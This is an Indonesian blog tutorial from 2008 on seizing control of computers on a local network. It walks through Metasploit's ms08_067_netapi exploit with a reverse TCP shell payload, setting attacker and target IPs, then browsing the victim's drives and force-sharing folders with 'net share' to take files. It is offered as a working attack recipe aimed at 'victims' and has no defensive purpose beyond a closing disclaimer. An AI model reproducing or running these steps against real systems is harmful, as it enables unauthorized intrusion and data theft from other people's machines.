Mengambil Alih Komputer Dalam Jaringan Lokal [by oghie]

Ho ho ho, akhirnya setalah istirahat panjang selama 3 tahun dari dunia IT, gue akhirnya kembali lagi. Kalau dalam film superhero “BATMAN RETURN”, no no… bukan BATMAN RETURN tapi oghie Return. Sekembali gue dari dunia Entertaintment (bukan artis lho) banyak buanget perubahan yang berarti di dunia IT, termasuk hacking. Kalau dijaman gue dulu, terakhir gue sempat menggunakan Windows XP Sp1 yang terdapat banyak sekali kelemahan. Namun sekarang gue lihat bapak Bill Gates udah ngeluarin pamungkas barunya yang begitu megah yaitu Windows Pisang… Uppss bukan Pisang tapi Windows Vista. He he he. Belum lagi XP udah di patch kelemahannya hingga Service Pack 3. Tapi tetap saja mempunyai kelemahan pada file Netapi32.dll pada direktori system32. Mau bukti…?, ok ok kita to the point aje.
Kali ini teknik yang kita gunakan yaitu teknik Remote Exploit. Dan Yang perlu kamu siapkan pada sesi kali ini yaitu:

* Metasploit Framework 3.2 For Windows, dapat kamu download disini:Klik Here

• Komputer target yang menggunakan OS Win XP SP2, SP3, Win2003, atau WinVista. (gue menggunakan Windows XP SP2).
  
• - Alamat IP Address Target.
  

Jika diatas telah
terpenuhi, sekarang kamu jalankan Program Metasploit 3.2, tepatnya kamu
pilih Metasploit 3 Web (lihat gambar).

Spoiler:

Tunggu beberapa saat,(sabar yach) Setelah itu akan tampil seperti gambar dibawah ini:

Spoiler:

Jika udah tampil loe pilih menu Console. Maka akan tampil jendela seperti berikut:

Spoiler:

Ketikkan perintah show exploits kemudian tekan Enter

Spoiler:

Maka akan tampil Modul exploit seperti beirkut:

Spoiler:

Kemudian pilih modul exploit untuk kelemahan pada Netapi32, caranya dengan mengetikkan :
use windows/smb/ms08_067_netapi kemudian Enter

Spoiler:

Kemudian pilih jenis payload. Kali ini
kita pilih payload yang akan menghubungkan shell komputer target dengan
komputer penyerang melalui TCP. Caranya dengan mengetikkan perintah:
set payload windows/shell/reverse_tcp (kemudian Enter)

Spoiler:

Kemudian masukkan IP Address kamu, dengan cara mengetikkan perintah :
set LHOST 192.168.0.17 Enter <----- Contoh dengan IP gue.

Spoiler:

Kemudian masukkan IP Address target kamu, dengan cara mengetikkan perintah :
set RHOST 192.168.0.16 Enter <----- Contoh dengan Target gue.

Spoiler:

Semuanya udah siap…? Siap…!!! Ready!!! 1….2….3… tunggu dulu bro, ketik dulu instruksi/perintah exploit kemudian tekan Enter.

Spoiler:

Tedennnnggggg!!! Abrakadabra!!!, sistem target telah diambil alih

Spoiler:

Sekarang kita telah berada di direktori c:\windows\system32
sang target. Akses penuh telah ditangan. Selanjutnya tinggal
kreatifitas kalian. Untuk mengintip data pada komputer target, silahkan
jalankan perintah MS DOS. Sebagai contoh, kita akan menuju drive “D”
korban, dengan mengetikkan perintah >> d: Enter. Kemudian lakukan perintah DIR untuk melihat isi data drive D komputer korban.

Spoiler:

Untuk mengambil data pada komputer korban, kita akan melakukan sharing paksa dari komputer korban dengan menjalankan perintah.
net share namafolder=d:\lokasifolder /UNLIMITED kemudian enter. Lihat gambar dibawah ini:

Spoiler:

Kemudian masuk pada windows Explorer,
lalu ketikkan pada Address Bar \\Alamat IP target\namafolder yang telah
dishare paksa. Contoh:

Spoiler:

Dan masih banyak lagi yang bisa kamu
lakukan jika telah melakukan Remote Exploit pada komputer target. Sekian
dari saya, untuk ngomel-ngomelnya silahkan komentar.

*penulis tidak bertanggungjawab atas segala penyalahgunaan isi artikel ini.
Makassar, Desember 2008.


-=gREEts=-: All crew HIMATEK AMIK Profesional Mks Angk 2001,2002,2003, COCONUT Computer Club STMIK Profesional, TSC STMIK Dipanegara, kecoakelektronik, antihackerlink...

CopyRight :oghie